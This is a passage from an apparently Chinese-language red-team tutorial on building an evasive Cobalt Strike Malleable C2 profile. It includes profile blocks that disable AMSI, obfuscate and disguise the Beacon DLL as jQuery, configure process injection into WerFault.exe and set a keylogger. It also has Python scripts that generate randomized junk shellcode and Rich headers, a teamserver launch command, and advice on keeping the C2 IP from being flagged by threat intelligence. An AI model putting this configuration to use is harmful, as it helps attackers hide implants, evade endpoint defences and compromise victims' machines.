prepend "\x87\xdb\x66\x87\xd2\x49\x66\x90\x87\xd2\x0f\x1f\x00\x87\xc9\x41\x66\x87\xc9\x42\x44\x0f\x1f\x00\x40\x40\x66\x87\xdb\x0f\x1f\x04\x00\x48\x46\x4c\x90\x45\x43\x47\x66\x0f\x1f\x04\x00\x0f\x1f\x00"; # prepend nops
strrep "ReflectiveLoader" "execute"; # Change this text in the Beacon DLL
strrep "beacon.x64.dll" ""; # Remove this text in the Beacon DLL
}
# stringw用于将字符串"jQuery"添加到DLL中,是为了使DLL看起来更像正常的JavaScript库文件,从而减少被检测的可能性
stringw "jQuery"; # Add this string to the DLL
}
# ================
# === 后渗透相关 ===
# ================
post-ex {
# 指定了32位Beacon在执行后渗透(post-exploitation)任务时注入shellcode的目标程序路径
set spawnto_x86 "%windir%\\syswow64\\WerFault.exe";
set spawnto_x64 "%windir%\\sysnative\\WerFault.exe";
# 启用对后渗透DLL的混淆
set obfuscate "true";
# 启用智能注入功能
set smartinject "true";
# 禁用AMSI
set amsi_disable "true";
# 定义了用于后渗透任务的命名管道名称。
set pipename "Winsock2\\CatalogChangeListener-###-0,";
# 设置键盘记录使用的函数
set keylogger "GetAsyncKeyState";
}
# ==================
# === 进程注入参数 ===
# ==================
process-inject {
# 设置远程进程中内存分配的方法
set allocator "NtMapViewOfSection";
# 注入内容的最小内存分配大小
set min_alloc "17500";
# Set memory permissions as permissions as initial=RWX, final=RX
# 注入内容的初始内存权限,false 意味着不是读写执行
set startrwx "false";
# rwx内存权限
set userwx "false";
transform-x86 {
# 在注入内容前添加NOP滑梯(\x90\x90是NOP指令的机器码)
prepend "\x87\xdb\x66\x87\xd2\x49\x66\x90\x87\xd2\x0f\x1f\x00\x87\xc9\x41\x66\x87\xc9\x42\x44\x0f\x1f\x00\x40\x40\x66\x87\xdb\x0f\x1f\x04\x00\x48\x46\x4c\x90\x45\x43\x47\x66\x0f\x1f\x04\x00\x0f\x1f\x00";
#append "\x90\x90";
}
transform-x64 {
prepend "\x87\xdb\x66\x87\xd2\x49\x66\x90\x87\xd2\x0f\x1f\x00\x87\xc9\x41\x66\x87\xc9\x42\x44\x0f\x1f\x00\x40\x40\x66\x87\xdb\x0f\x1f\x04\x00\x48\x46\x4c\x90\x45\x43\x47\x66\x0f\x1f\x04\x00\x0f\x1f\x00";
#append "\x90\x90";
}
execute {
# 使用CreateThread函数创建一个线程,并使用特定的偏移量(+0x42)作为线程的入口点。这通常用于当前进程的自我注入
CreateThread "ntdll!RtlUserThreadStart+0x42";
# 这是一个通用的CreateThread方法,它尝试创建一个线程而不指定特定的入口点
CreateThread;
# 这个方法使用APC(异步过程调用)线程注入技术,-s表示这是一个“Stealth”版本的APC注入,可能更难以被检测
NtQueueApcThread-s;
# 这个方法尝试跨进程创建远程线程,这是一种常见的跨进程注入技术
CreateRemoteThread;
# 这个方法使用RtlCreateUserThread函数进行注入,它支持所有架构依赖的情况,例如32位到64位的注入,并且可以跨会话边界进行注入
RtlCreateUserThread;
}
}
修改profile文件, 增强opsec的效果
https://github.com/WKL-Sec/Malleable-CS-Profiles
prepend.py 是一个 python 脚本,用于生成动态垃圾 shellcode,该 shellcode 将附加在实际 shellcode的开头。
import random
# Define the byte strings to shuffle
byte_strings = ["40", "41", "42", "6690", "40", "43", "44", "45", "46", "47", "48", "49", "4c", "90", "0f1f00", "660f1f0400", "0f1f0400", "0f1f00", "0f1f00", "87db", "87c9", "87d2", "6687db", "6687c9", "6687d2"]
# Shuffle the byte strings
random.shuffle(byte_strings)
# Create a new list to store the formatted bytes
formatted_bytes = []
# Loop through each byte string in the shuffled list
for byte_string in byte_strings:
# Check if the byte string has more than 2 characters
if len(byte_string) > 2:
# Split the byte string into chunks of two characters
byte_list = [byte_string[i:i+2] for i in range(0, len(byte_string), 2)]
# Add \x prefix to each byte and join them
formatted_bytes.append(''.join([f'\\x{byte}' for byte in byte_list]))
else:
# Add \x prefix to the single byte
formatted_bytes.append(f'\\x{byte_string}')
# Join the formatted bytes into a single string
formatted_string = ''.join(formatted_bytes)
# Print the formatted byte string
print(formatted_string)
运行脚本
python3 prepend.py
复制输出并将其粘贴到配置文件中(在 transform-x64 或 transform-x86 块内)
transform-x64 {
...
prepend
"\x44\x40\x4B\x43\x4C\x48\x90\x66\x90\x0F\x1F\x00\x66\x0F\x1F\x04\x00\x0F\x1F\x04\x00\
x0F\x1F\x00\x0F\x1F\x00";
...
}
rich_header.py 是一个 python 脚本,它生成动态 shellcode,负责编译器插入的元信息。Rich 标头是一个 PE 部分,用作 Windows 可执行文件生成环境的指纹
#rich header
import random
def generate_junk_assembly(length):
return ''.join([chr(random.randint(0, 255)) for _ in range(length)])
def generate_rich_header(length):
rich_header = generate_junk_assembly(length)
rich_header_hex = ''.join([f"\\x{ord(c):02x}" for c in rich_header])
return rich_header_hex
#generate a number of assembly opcodes (4-byte aligned)
print(generate_rich_header(random.randint(5,20) * 4))
运行脚本
python3 rich_header.py
复制输出并将其粘贴到配置文件中
stage {
...
set rich_header "\x2e\x9a\xad\xf1...";
...
}
检查profile文件
进行各种协议 如 smb , http , https的请求模拟 , 判断是否可用 , 请求结束下面会有结果输出 (黄色警告,红色语法错误)
chmod +x c2lint
./c2lint </to/profile/file/path> # 如 ./c2lint jquery-c2.4.5-jx.profile
Profile参考库
https://github.com/threatexpress/malleable-c2
使用burp插件生成Profile文件
可以通过Burp代理选中请求,生成Cobalt Strike的profile文件
https://github.com/Peithon/JustC2file
注意事项:不使用默认的配置参数值,利用目标站点的证书信息生成证书,可信度会更高一些
使用profile文件启动CS
./teamserver 192.168.101.48 123456 jquery-c2.4.5-jx.profile
特别注意
VPS 上的 teamserver 在不使用时一定要关闭,要不然很容易被威胁情报标记处 木马 c2 ip , 用的时候再开启 , 不要不用一直在那里开着